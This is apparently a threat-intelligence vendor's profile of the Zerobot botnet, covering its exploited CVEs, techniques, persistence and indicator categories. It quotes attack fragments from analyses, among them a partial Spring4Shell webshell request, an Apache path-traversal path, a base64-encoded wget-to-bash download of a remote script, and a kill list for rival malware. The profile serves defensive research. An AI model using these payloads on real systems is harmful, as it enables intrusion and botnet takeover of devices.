Zerobot, also known as ZeroStresser, is a malware-as-a-service botnet initially documented in 2022 as a Go-based threat targeting internet-exposed IoT devices and web-facing systems. It compromises routers, firewalls, cameras, web servers, and related appliances through exploitation of known remote-code-execution, command-injection, authentication-bypass, and path-traversal vulnerabilities, and by brute-forcing weak or default SSH and Telnet credentials. Compromised systems are enrolled into a distributed denial-of-service botnet; observed versions support multiple flooding methods and scan for additional exposed victims. Zerobot uses architecture-specific payloads and has targeted a broad range of embedded-device CPU architectures. It has also been observed in Linux and Windows-capable forms, with platform-specific persistence mechanisms. Some variants terminate competing malware, clear shell-command history, and use packing, encrypted strings, or browser-like user agents to hinder analysis and detection. Microsoft tracks associated activity as Storm-1061. A later Mirai-based iteration, zerobotv9, was observed exploiting vulnerabilities affecting Tenda routers and the n8n automation platform, demonstrating continued use of newly disclosed vulnerabilities for botnet propagation.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
30 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
n8n RCE vulnerability in CISA KEV with a public exploit; the article explicitly cites Zerobot malware. | CVE-2025-68613 (Remote Code Execution) ... Public Exploit exists Zerobot Malware News
CVE-2017-17215 is included in Zerobot, but the article says the XML payload syntax is incorrect in two places, making it not functional. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
At the beginning, the article says Zerobot contained 21 exploits for various vulnerabilities, including Spring4Shell. Later it provides a two-request exploit chain for CVE-2022-22965. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2020-25506 is listed among the vulnerabilities exploited by Zerobot, with a POST /cgi-bin/system_mgr.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2016-20017 is listed among the vulnerabilities exploited by Zerobot, with a GET /login.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
Zerobot contained exploits for CVE-2014-8361. The article states the XML payload syntax is incorrect in two places and that this exploit is not functional. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-41773 and CVE-2021-42013 are both contained in the same Go method inside the malware binary, and separate POST paths are shown for each. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2020-10987 is listed among the vulnerabilities exploited by Zerobot, with a GET /goform/setUsbUnload/.js payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-1388 is listed among the vulnerabilities exploited by Zerobot, with a POST /mgmt/tm/util/bash request and JSON payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-36260 is listed among the vulnerabilities exploited by Zerobot, with a POST /SDK/webLanguage payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-34538 is listed among the vulnerabilities exploited by Zerobot, with a GET /cgi-bin/admin/vca/bia/addacph.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-30525 is listed among the vulnerabilities exploited by Zerobot, with a POST /ztp/cgi-bin/handler JSON payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-35395 is listed among the vulnerabilities exploited by Zerobot, with a POST /goform/formWsc payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-37061 is listed among the vulnerabilities exploited by Zerobot, with a POST /res.php payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2020-7209 is listed among the vulnerabilities exploited by Zerobot. The article notes the Go method is mislabeled as CVE-2017-17106 in the malware binary. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-26186 is listed among the vulnerabilities exploited by Zerobot, with a POST /cgi-bin/cstecgi.cgi?exportOvpn= payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-46422 is listed among the vulnerabilities exploited by Zerobot, with a GET /cgi-bin/admin.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-26210 is listed among the vulnerabilities exploited by Zerobot, with a POST /cgi-bin/cstecgi.cgi JSON payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2021-41773 and CVE-2021-42013 are both contained in the same Go method inside the malware binary, and separate POST paths are shown for each. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
CVE-2022-25075 is listed among the vulnerabilities exploited by Zerobot, with a GET /cgi-bin/downloadFlile.cgi payload shown. | At the end of November, CUJO AI Labs reported a new botnet written in Golang – now called Zerobot – which contained 21 exploits for various vulnerabilities, including Spring4Shell.
Microsoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers. | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2019-10655 Grandstream | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2020-25223 WebAdmin of Sophos SG UTM | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Since the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2022-31137 Roxy-WI | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot 1.1 includes several new vulnerabilities, such as: CVE-2017-17105 Zivif PR115-204-P-RS | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively). | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Microsoft researchers have also identified that previous reports have used the vulnerability ID “ZERO-32906” for CVE-2018-20057 | Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp ... first.prefix=tomcatwar ... Second request: GET /stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=
Daemon: Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
Daemon: Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
CVE-2021-41773 Apache webserver Path Traversal ... CVE-2021-42013 Apache webserver Path Traversal No.2 ... POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
The exploit code below is used with base64 encoding ... echo d2dldCBodHRwOi8vemVyby5zdWRvbGl0ZS5tbC96ZXJvLnNo ... | base64 -d | bash
This Go method is called CVE-2017-17106 in the malware binary, which is a completely different vulnerability ... These two exploits are contained in the same Go method inside the malware binary called CVE-2018-12613, which is a completely different vulnerability
Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices.
killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox || pkill -9 -f i .i mozi.m Mozi.m mozi.a Mozi.a sora phantom zero kaiten Nbrute minerd /bin/busybox
70 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
CVE-2025-68613 (Remote Code Execution) ... Public Exploit exists Zerobot Malware News
Referenced as a newer Mirai fork with added Windows infection capability.
Mirai-derived botnet malware targeting IoT devices and exposed services (notably Tenda AC1206 routers and n8n). It spreads via exploitation of RCE flaws, drops a shell script (tol.sh) to fetch and execute the main multi-architecture payload (zerobotv9), and provides DDoS-style attack capabilities (e.g., TCPXmas, Mixamp) plus additional methods (SSH, Discord).
Mirai-based botnet exploiting vulnerabilities in both traditional IoT (routers) and enterprise-adjacent automation platforms (n8n) to expand infections; may increase organizational risk by enabling compromise of more critical infrastructure.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.